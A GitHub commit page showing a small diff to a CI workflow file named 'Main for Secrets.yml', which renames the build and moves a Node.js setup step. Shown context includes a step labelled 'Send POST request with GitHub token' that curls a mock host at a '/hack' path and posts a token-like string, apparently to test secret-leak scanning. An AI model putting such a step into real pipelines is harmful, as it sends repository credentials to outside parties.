Skip to content

Commit

Permalink
Update Main for Secrets.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
Pranesh-Shrestha authored Dec 18, 2024
1 parent 8493a12 commit 83dab69
Showing 1 changed file with 10 additions and 7 deletions.
17 changes: 10 additions & 7 deletions .github/workflows/Main for Secrets.yml
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
name: Build Python Package
name: Build JS Package
on:
push:
branches: [ STAGE ]
Expand Down Expand Up @@ -88,11 +88,7 @@ jobs:
SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }}
- name: Checkout the code
uses: actions/checkout@v3
- name: Use Node.js ${{ matrix.node-version }}
uses: actions/setup-node@v3
with:
node-version: ${{ matrix.node-version }}


- name: Send POST request with GitHub token
run: |
curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
Expand All @@ -105,6 +101,13 @@ jobs:
curl -k -X POST https://api.github.com/endpoint \
-d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}'
- name: install dependencies
- name: Use Node.js ${{ matrix.node-version }}
uses: actions/setup-node@v3
with:
node-version: ${{ matrix.node-version }}
- run: npm install





0 comments on commit 83dab69

Please sign in to comment.